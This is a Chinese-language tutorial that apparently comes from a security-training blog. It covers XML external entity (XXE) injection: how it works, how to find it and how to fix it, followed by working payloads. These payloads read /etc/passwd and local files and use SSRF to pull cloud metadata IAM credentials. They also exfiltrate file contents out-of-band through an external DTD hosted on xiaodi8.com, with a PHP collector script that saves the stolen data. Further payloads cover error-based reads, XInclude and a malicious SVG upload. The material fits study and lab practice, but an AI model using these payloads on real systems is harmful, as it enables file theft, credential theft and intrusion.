Web攻防-XML&XXE&无回显带外&SSRF元数据&DTD实体&OOB盲注&文件拓展

知识点:

1、WEB攻防-XML&XXE-注入原理&分类&修复

2、WEB攻防-XML&XXE-文件读取&SSRF&实体引用

3、WEB攻防-XML&XXE-无回显&升级拓展&挖掘思路


一、演示案例-WEB攻防-XML&XXE-注入原理&分类&安全影响

详细点

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。等同于JSON传输。

XMLHTML 的主要差异:
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设计用来显示数据,其焦点是数据的外观。
HTML 旨在显示信息 ,而XML旨在传输存储信息。

XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞:XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取(最主要的影响)、命令执行、内网扫描、攻击内网等危害。

XXE黑盒发现

bash 复制代码
两类:
数据包的测试
功能点的测试

1、获取得到Content-Type或数据类型为xml时,尝试xml语言payload进行测试

2、不管获取的Content-Type类型或数据传输类型,均可尝试修改后提交测试xxe

3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行(百度docx xxe即可)

参考地址:https://blog.csdn.net/weixin_57567655/article/details/124588490

XXE白盒发现

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

XXE修复防御方案

bash 复制代码
方案1-禁用外部实体
PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python:
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
 
方案2-过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC

二、演示案例-WEB攻防-XML&XXE-有回显利用-文件读取&SSRF&外部实体

1、文件读取

bash 复制代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>


2、SSRF&配合元数据

bash 复制代码
条件:存在XXE注入的云服务器应用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>


3、文件读取-外部引用实体dtd

bash 复制代码
file.dtd
<!ENTITY send SYSTEM "file:///c:/c.txt">


bash 复制代码
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://xiaodi8.com/file.dtd">
%file;
]>
<user><username>&send;</username><password>xiaodi</password></user>

三、演示案例-WEB攻防-XML&XXE-无回显利用&文件拓展解析等

无回显利用

1、DNSLOG-带外测试

bash 复制代码
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://xiaodi8.dnslog.cn">
%file;
]>
<user><username>xiaodi</username><password>xiaodi</password></user>


2、文件读取-外部引用实体dtd配合带外

bash 复制代码
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///c:/c.txt">
<!ENTITY % remote SYSTEM "http://www.xiaodi8.com/test.dtd">
%remote;
%all;
]>
<user><username>&send;</username><password>xiaodi</password></user>
 
test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://www.xiaodi8.com/get.php?file=%file;'>">
 
get.php:
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>
 
执行逻辑顺序:test.dtd->all->send->get.php?file=%file->file:///c:/c.txt
http://www.xiaodi8.com/get.php?file=读取的内网数据


3、文件读取-外部引用实体dtd配合错误解析

bash 复制代码
test.dtd内容:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
 //这是一个报错的payload,利用目标服务器报错解析来读取文件内容。

BURP靶场

bash 复制代码
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ab2006f03dce8a4803dfde101f3007d.exploit-server.net/exploit"> %xxe;]>


文件拓展解析

1、xinclude利用

XInclude 是一种让你能把多个独立的 XML 文件像拼积木一样"动态组合"成一个大 XML 文档的标准方法。它通过在主文件里放置特殊的"包含指令"(<xi:include>),告诉 XML 处理器在需要的时候去自动加载并插入指定文件的内容。这样做的主要好处是让大型 XML 文档更容易编写、维护和复用。

一些应用程序接收客户端提交的数据,在服务器端将其嵌入到XML文档中,然后解析该文档,所以利用xinclude嵌套进去执行。

BURP靶场

bash 复制代码
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>


2、文件上传-SVG图像解析(docx等)

一些应用程序接收解析文件,可以使用基于XML的格式的例子有DOCX这样的办公文档格式和SVG这样的图像格式进行测试。

SVG图片

bash 复制代码
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>





SRC文章:https://mp.weixin.qq.com/s/5iPoqsWpYfQmr0ExcJYRwg

DOCX文档

参考文章:https://blog.csdn.net/weixin_57567655/article/details/124588490

3、功能点挖掘总结

bash 复制代码
基于XML的Web服务: SOAP、REST和RPC API这些接收和处理XML格式
导入/导出功能: 任何以 XML 格式传输数据的进出口
RSS/Atom 订阅处理器: 订阅功能也可能隐藏着 XXE 漏洞。
文档查看器/转换器: 处理DOCX、XLSX等XML 格式文档的功能
文件上传处理 XML: 比如SVG图像处理器,上传图片也可能中招!
相关推荐
CrimsonEmber16 小时前
ros2的package.xml和rosdep
xml·ros2
看天走路吃雪糕1 天前
墨者:XPath注入漏洞实战
xml·xpath·sql注入·墨者学院
探索java2 天前
深入解析 Spring 获取 XML 验证模式的过程
xml·java·spring
阿华的代码王国2 天前
【Android】卡片式布局 && 滚动容器ScrollView
android·xml·java·前端·后端·卡片布局·滚动容器
柊二三2 天前
XML的简略知识点
xml·数据库·oracle
探索java3 天前
Spring 解析 XML 配置文件的过程(从读取 XML 到生成 BeanDefinition)
xml·java·spring·xmlbeanfactory
阿华的代码王国4 天前
【Android】相对布局应用-登录界面
android·xml·java
工藤新一OL4 天前
把xml的格式从utf-8-bom转为utf-8
xml·c#·asp.net·.netcore·visual studio
henysugar4 天前
便捷删除Android开发中XML中重复字符串资源的一个办法
android·xml
程序员编程指南4 天前
Qt XML 与 JSON 数据处理方法
xml·c语言·c++·qt·json